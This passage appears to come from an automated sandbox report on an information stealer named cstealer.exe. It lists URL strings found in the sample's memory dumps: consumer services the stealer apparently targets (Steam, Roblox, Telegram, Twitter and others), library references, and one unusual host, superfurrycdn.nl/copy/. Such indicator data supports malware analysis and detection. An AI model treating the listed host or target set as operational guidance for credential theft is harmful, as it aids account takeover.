                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://roblox.com)z
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sellix.io)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sellix.io)z
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://spotify.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spotify.com)z
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stake.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stake.com))
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steam.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.com)z
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://superfurrycdn.nl/copy/
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://telegram.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.com)z
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tiktok.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiktok.com)z
                                Source: cstealer.exe, 00000003.00000002.2628303853.00000271D9E83000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2495003008.00000271D9E7F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2553076024.00000271D9E82000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2178442107.00000271D9E64000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2550902287.00000271D9E80000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2484503329.00000271D9E7D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2407518867.00000271D9E5D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2443036423.00000271D9E7C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2177316384.00000271D9E57000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275592639.0000020102C31000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2297938148.0000020102C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitch.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitch.com)z
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com)z
                                Source: cstealer.exe, 00000003.00000003.2527962136.00000271DA17F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2473409999.00000271DA17D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2665159466.00000271DA184000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2519598138.00000271DA17E000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2490199129.00000271D9FDB000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2496547521.00000271D9FF4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2501756441.00000271DA17D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2179117059.00000271DA183000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2435547245.00000271D9FDA000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2183488711.00000271DA183000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2273985775.0000020103198000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2276170958.0000020102A66000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215152893.0000020103155000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2222114671.0000020103198000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2279541412.0000020102A73000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2217808109.0000020103199000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2281510656.000002010319A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215152893.0000020103182000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2273515277.0000020103198000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219393819.0000020103199000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://uber.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uber.com)z
                                Source: cstealer.exe, 00000003.00000002.2700205546.00000271DA8A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2386235093.0000020103570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
                                Source: cstealer.exe, 00000003.00000002.2700205546.00000271DA8A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2386235093.0000020103570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyP
                                Source: cstealer.exe, 00000003.00000002.2700205546.00000271DA8A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2386235093.0000020103570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
                                Source: cstealer.exe, 00000003.00000003.2176664163.00000271DA486000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN
                                Source: cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                                Source: cstealer.exe, 00000002.00000003.2164299642.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191232291.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2488888801.00007FF8A8376000.00000002.00000001.01000000.0000002B.sdmp, cstealer.exe, 00000009.00000002.2538789657.00007FF8B80DB000.00000002.00000001.01000000.0000002A.sdmpString found in binary or memory: https://www.openssl.org/H
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2647937867.00000271DA031000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2544001972.00000271DA031000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2553966495.00000271DA031000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215216888.0000020102AB5000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212971646.0000020102AC6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2214455444.0000020102AC6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2274584655.0000020102AB5000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2278980759.0000020102AB5000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2221596067.0000020102AB5000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2217913546.0000020102AB5000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280237050.0000020102AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
                                Source: cstealer.exe, 00000003.00000002.2685159509.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2552853520.00000271D9E61000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2454347629.00000271D9E5F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2496638039.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2526154847.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2407518867.00000271D9E5D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2465182617.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2534726372.00000271D9E5F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2475893944.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2626607283.00000271D9E63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2437236490.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2278585948.0000020102D69000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2288716798.0000020102D73000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C45000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219297848.0000020103202000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
